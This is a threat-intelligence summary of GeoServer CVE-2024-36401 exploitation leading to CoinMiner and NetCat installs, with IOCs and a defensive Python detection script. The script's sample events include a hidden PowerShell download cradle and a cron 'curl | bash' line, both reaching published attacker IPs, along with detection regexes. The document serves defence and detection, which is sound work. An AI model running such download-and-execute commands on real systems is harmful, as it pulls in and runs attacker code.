Full Report
AhnLab SEcurity intelligence Center (ASEC) has confirmed that unpatched GeoServer instances are still under continuous attack. Threat actors are scanning for vulnerable GeoServer instances and installing a CoinMiner. ASEC has also identified cases of infection in South Korea.

1. GeoServer Remote Code Execution Vulnerability (CVE-2024-36401)

GeoServer is an open-source Geographic Information System (GIS) server written in […]
Analysis Summary
# Vulnerability: GeoServer Remote Code Execution Leading to CoinMiner Installation (CVE-2024-36401)
## CVE Details
- CVE ID: CVE-2024-36401
- CVSS Score: Not provided in the source text; an unauthenticated RCE of this kind typically implies High severity.
- CWE: Not provided in the source text; the flaw class allows remote code execution.
## Affected Systems
- Products: GeoServer (Open-source Geographic Information System (GIS) server)
- Versions: Unpatched versions of GeoServer.
- Configurations: Environments running GeoServer on both Windows and Linux operating systems.
## Vulnerability Description
The vulnerability is a Remote Code Execution (RCE) flaw in unpatched versions of GeoServer, which is written in Java. Successful exploitation allows an unauthenticated remote attacker to execute arbitrary code on the underlying server. Threat actors, including Earth Baxia, have been observed actively targeting these systems to install malware, most prominently CoinMiners (such as XMRig) and remote access tools (such as NetCat).
## Exploitation
- Status: Exploited in the wild (Continuous attacks confirmed by ASEC).
- Complexity: Implied to be relatively low given the sustained exploitation efforts by various threat actors.
- Attack Vector: Network (Remote).
## Impact
- Confidentiality: High (Achieving RCE allows for subsequent data theft, as seen with C&C activity).
- Integrity: High (System integrity is compromised by the installation of unauthorized software like NetCat and XMRig).
- Availability: Medium to High (System resources are consumed by coin mining activities, and the system can be leveraged for further attacks or denial of service).
## Remediation
### Patches
- Ensure GeoServer is updated to a version that contains the patch for CVE-2024-36401, as advised by the vendor. (Specific patched version not listed in source text).
### Workarounds
- **Network Isolation:** Restrict external access to the GeoServer instance to only necessary, trusted networks.
- **Process Monitoring:** Monitor running processes for unauthorized activity, especially PowerShell or Bash processes spawned from GeoServer that open network connections, particularly those related to XMRig or NetCat.
- **Input Validation/Filtering:** If patching is delayed, review the input vectors that reach GeoServer where applicable; note, however, that a flaw of this kind (likely a core deserialization, command injection, or similar issue) is usually difficult to mitigate reliably without the vendor patch.
## Detection
- **Indicators of Compromise (IOCs):**
  - **Files/Scripts:** Presence of files like `adminc.ps1` or XMRig/related mining binaries.
  - **Persistence:** Suspicious Cron job entries (Linux) that download content from external URLs.
- **Detection Methods and Tools:**
  - Monitor for outbound network connections from the GeoServer process to external IP addresses on non-standard ports (e.g., Monero mining pool traffic).
  - Look for long, obfuscated PowerShell commands initiated by the GeoServer process that download and execute remote scripts (e.g., `IEX (New-Object Net.WebClient).DownloadString(...)`).
- **Specific IOCs to block/monitor:**
  - Hash: `0b3744373c32dc6de80dfc081200d9f8`, `310c17c19e90381114d47914bcb3ccf2`, etc.
  - URL (example downloader): hxxp://182[.]218[.]82[.]14/js/1/gw[.]txt
  - IP (example C&C/distribution node): 107[.]180[.]100[.]247
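The detection methods and IOCs above can be turned into a small triage script. The following is an added example written for this summary, not code from ASEC or the GeoServer project. It assumes a simple, constructed event schema (process-creation, cron, network-connection and file events as Python dicts), assumes the GeoServer JVM can be recognised by the word `geoserver` in its parent command line, and uses a hypothetical 400-character threshold for "long" command lines; the hashes, URL host and IP are the ones quoted in the report above with the defanging removed, and the sample events are constructed for illustration.

```python
"""Triage helper for the GeoServer -> CoinMiner activity described above.

Added example (not from the ASEC report). The event schema below is a
constructed placeholder, not any real EDR/SIEM format.
"""
import re
from dataclasses import dataclass

# Indicators quoted from the report text above (refanged so they can be matched).
IOC_HASHES = {"0b3744373c32dc6de80dfc081200d9f8", "310c17c19e90381114d47914bcb3ccf2"}
IOC_HOSTS = {"182.218.82.14", "107.180.100.247"}
IOC_FILENAMES = {"adminc.ps1"}

# Assumption: the GeoServer process has "geoserver" somewhere in its command line.
GEOSERVER = re.compile(r"geoserver", re.I)
# Child interpreters worth inspecting when GeoServer is the parent.
SHELLS = re.compile(r"(?:^|[\\/])(?:powershell(?:\.exe)?|pwsh(?:\.exe)?|cmd\.exe|bash|sh)$", re.I)
# PowerShell download cradle: Invoke-Expression/IEX combined with a remote fetch.
PS_CRADLE = re.compile(r"\b(?:iex|invoke-expression)\b.*\b(?:downloadstring|downloadfile|invoke-webrequest|iwr)\b", re.I)
PS_ENCODED = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s", re.I)
MINER = re.compile(r"xmrig|stratum\+tcp|monero", re.I)
# Cron entry that fetches a remote URL and pipes it straight into a shell.
CRON_FETCH_PIPE = re.compile(r"\b(?:curl|wget)\b[^|;]*https?://[^|;]*\|\s*(?:ba)?sh\b", re.I)
LONG_CMDLINE = 400  # assumption: heuristic threshold for "long, obfuscated" commands


@dataclass
class Finding:
    index: int   # position of the offending event in the input list
    rule: str
    reason: str


def _check_process(i, ev):
    """Shell/PowerShell spawned by GeoServer doing something download- or miner-like."""
    if not (GEOSERVER.search(ev.get("parent", "")) and SHELLS.search(ev.get("image", ""))):
        return None
    cmd = ev.get("cmdline", "")
    reasons = []
    if PS_CRADLE.search(cmd):
        reasons.append("download cradle")
    if PS_ENCODED.search(cmd):
        reasons.append("encoded command")
    if MINER.search(cmd):
        reasons.append("miner marker")
    if any(name in cmd.lower() for name in IOC_FILENAMES):
        reasons.append("IoC filename")
    if len(cmd) > LONG_CMDLINE:
        reasons.append(f"command line >{LONG_CMDLINE} chars")
    return Finding(i, "geoserver_child_shell", "; ".join(reasons)) if reasons else None


def _check_cron(i, ev):
    """Cron persistence that pulls and executes remote content, or references an IoC host."""
    line = ev.get("line", "")
    if CRON_FETCH_PIPE.search(line) or any(host in line for host in IOC_HOSTS):
        return Finding(i, "cron_remote_fetch", "cron entry fetches/runs remote content")
    return None


def _check_netconn(i, ev):
    """GeoServer process talking to a known distribution/C&C address."""
    if GEOSERVER.search(ev.get("cmdline", "")) and ev.get("remote_ip") in IOC_HOSTS:
        return Finding(i, "netconn_to_ioc", f"GeoServer process connected to {ev['remote_ip']}")
    return None


def _check_file(i, ev):
    """File whose hash or name matches the published indicators."""
    reasons = []
    if ev.get("md5", "").lower() in IOC_HASHES:
        reasons.append("hash match")
    if re.split(r"[\\/]", ev.get("path", ""))[-1].lower() in IOC_FILENAMES:
        reasons.append("filename match")
    return Finding(i, "ioc_file", "; ".join(reasons)) if reasons else None


CHECKS = {"process": _check_process, "cron": _check_cron,
          "netconn": _check_netconn, "file": _check_file}


def scan_events(events):
    """Run every applicable check over the event list and return the findings in order."""
    findings = []
    for i, ev in enumerate(events):
        check = CHECKS.get(ev.get("type"))
        finding = check(i, ev) if check else None
        if finding:
            findings.append(finding)
    return findings


# Constructed sample telemetry: two malicious Windows/Linux artefacts, two benign ones, etc.
SAMPLE_EVENTS = [
    {"type": "process", "parent": "java -jar start.jar geoserver", "image": "powershell.exe",
     "cmdline": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
                ".DownloadString('http://182.218.82.14/js/1/gw.txt')"},
    {"type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell Get-ChildItem C:\\Users"},
    {"type": "cron", "line": "*/5 * * * * curl -s http://107.180.100.247/x.sh | bash"},
    {"type": "cron", "line": "0 3 * * * /usr/bin/certbot renew --quiet"},
    {"type": "netconn", "cmdline": "java -Dgeoserver.data.dir=/data", "remote_ip": "107.180.100.247"},
    {"type": "file", "path": "C:\\Windows\\Temp\\adminc.ps1", "md5": "0b3744373c32dc6de80dfc081200d9f8"},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"[{f.rule}] event {f.index}: {f.reason}")
```

The checks are deliberately parent-aware: a download cradle launched from `explorer.exe` is noise for this report, while the same command line under the GeoServer JVM is the exact post-exploitation pattern described above. Replace the constructed dicts with whatever your EDR or auditd pipeline emits and keep the regexes as a starting point, not a complete ruleset.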
## References
- [Vendor Advisories]: Seek official GeoServer security advisories pertaining to CVE-2024-36401.
- [Relevant Links]:
  - hxxps://www[.]fortinet[.]com/blog/threat-research/threat-actors-exploit-geoserver-vulnerability-cve-2024-36401
  - hxxps://www[.]trendmicro[.]com/en_us/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit[.]html